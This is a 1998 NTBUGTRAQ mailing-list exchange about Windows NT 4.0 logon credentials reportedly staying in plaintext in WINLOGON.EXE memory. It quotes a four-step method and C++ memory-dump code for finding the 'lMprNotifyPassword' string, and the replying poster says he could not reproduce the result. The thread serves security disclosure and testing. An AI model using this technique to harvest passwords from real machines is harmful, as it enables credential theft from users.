Everhart, Glenn From: Raphael Barber [RaphaelB@FCCTI.CO.UK] Sent: Friday, December 04, 1998 10:20 AM To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM Subject: FW: Win NT 4.0 UserId and Password available in memory Oooops. Meant to post to the list... > -----Original Message----- > From: Raphael Barber > Sent: Thursday, December 03, 1998 1:43 PM > To: 'russell.osterlund@ZURICH.COM' > Subject: RE: Win NT 4.0 UserId and Password available in memory > > I've tried this but couldn't find anything that looks like what you > describe... > this is what I got : > > Dumping Memory for Process ID 34, 4096 bytes starting at address > 0x10000 (4096 requested) > > 0x00000000 C.O.M.P.U.T.E.R.N.A.M.E.=.R.A.P. > 0x00000020 H.A.E.L...C.o.m.S.p.e.c.=.C.:.\. > 0x00000040 W.I.N.N.T.\.s.y.s.t.e.m.3.2.\.c. > 0x00000060 m.d...e.x.e...L.O.G.O.N.S.E.R.V. > 0x00000080 E.R.=.\.\.R.A.P.H.A.E.L...N.U.M. > 0x000000A0 B.E.R._.O.F._.P.R.O.C.E.S.S.O.R. > 0x000000C0 S.=.1...O.S.=.W.i.n.d.o.w.s._.N. > 0x000000E0 T...O.s.2.L.i.b.P.a.t.h.=.C.:.\. > 0x00000100 W.I.N.N.T.\.s.y.s.t.e.m.3.2.\.o. > 0x00000120 s.2.\.d.l.l.;...P.a.t.h.=.C.:.\. > 0x00000140 W.I.N.N.T.\.s.y.s.t.e.m.3.2.;.C. > 0x00000160 :.\.W.I.N.N.T...P.R.O.C.E.S.S.O. > 0x00000180 R._.A.R.C.H.I.T.E.C.T.U.R.E.=.x. > 0x000001A0 8.6...P.R.O.C.E.S.S.O.R._.I.D.E. > 0x000001C0 N.T.I.F.I.E.R.=.x.8.6...F.a.m.i. > 0x000001E0 l.y...5...M.o.d.e.l...4...S.t.e. > 0x00000200 p.p.i.n.g...4.,...G.e.n.u.i.n.e. > 0x00000220 I.n.t.e.l...P.R.O.C.E.S.S.O.R._. > 0x00000240 L.E.V.E.L.=.5...P.R.O.C.E.S.S.O. > 0x00000260 R._.R.E.V.I.S.I.O.N.=.0.4.0.4... > 0x00000280 S.y.s.t.e.m.D.r.i.v.e.=.C.:...S. > 0x000002A0 y.s.t.e.m.R.o.o.t.=.C.:.\.W.I.N. > 0x000002C0 N.T...U.S.E.R.P.R.O.F.I.L.E.=.C. > 0x000002E0 :.\.W.I.N.N.T.\.P.r.o.f.i.l.e.s. > 0x00000300 \.r.a.p.h.a.e.l...w.i.n.d.i.r.=. > 0x00000320 C.:.\.W.I.N.N.T.....N.N.T....... > 0x00000340 ................................ > 0x00000360 ................................ > 0x00000380 ................................ > 0x000003A0 ................................ > > using the following code (FTWCR) > > HANDLE > hProcess=OpenProcess(PROCESS_QUERY_INFORMATION|PROCESS_VM_READ,TRUE,id); > if(hProcess) > { > void* lpBaseAddress=(void*) base; > BYTE* lpBuffer=new BYTE[size]; > DWORD dwNumberOfBytesRead=0; > if(ReadProcessMemory(hProcess, (void*)lpBaseAddress, > lpBuffer, size, &dwNumberOfBytesRead)) > { > printf("Dumping Memory for Process ID %d, %d > bytes starting at address 0x%X (%d > requested)\n",id,dwNumberOfBytesRead,base,size); > for(int n=0;n { > if(n%32==0) printf("\n0x%08X > ",n); > > printf("%c",isgraph(lpBuffer[n])?lpBuffer[n]=='\0'?'_':lpBuffer[n]:'.'); > } > printf("\n"); > } > else > printf("Error %d.\n",GetLastError()); > delete [] lpBuffer; > } > > there's no more readable text in the rest of the page, and I > couldn't read beyond that.... > > This was a very quick check, so I'm sure I've overlooked > something.... could you give more details of your test? > > Raphael > > > Russ wrote: > > I have "stumbled upon" something peculiar concerning Windows NT 4.0 > Workstation security. It seems that the userid and password > remain in memory after a user has successfully logged on. > Specifically, > the memory space associated with WINLOGON.EXE memory > (the memory block containing the environment space) contains the > values > "lMprNotifyUserName=xxxx" and "lMprNotifyPassword=yyyy", > where "xxxx" is the userid used to issue the logon to the > workstation and > "yyyy" is the password. > > Is this widely known? It seems that basic security on a workstation > has > been compromised by this behavior. > > The algorithm used to discover the password and userid is the > following: > > 1) Locate and determine WINLOGON's process id. > 2) Open up this process for PROCESS_QUERY_INFORMATION and > PROCESS_VM_READ > access. > 3) Issue a ReadProcessMemory on the address 0x00010000 for one page. > 4) Scan the copied memory area for the strings "lMprNotifyPassword=" > and > "lMprNotifyUserName" and display what comes after. > > Thank you in advance for your interest. > > Russ Osterlund > >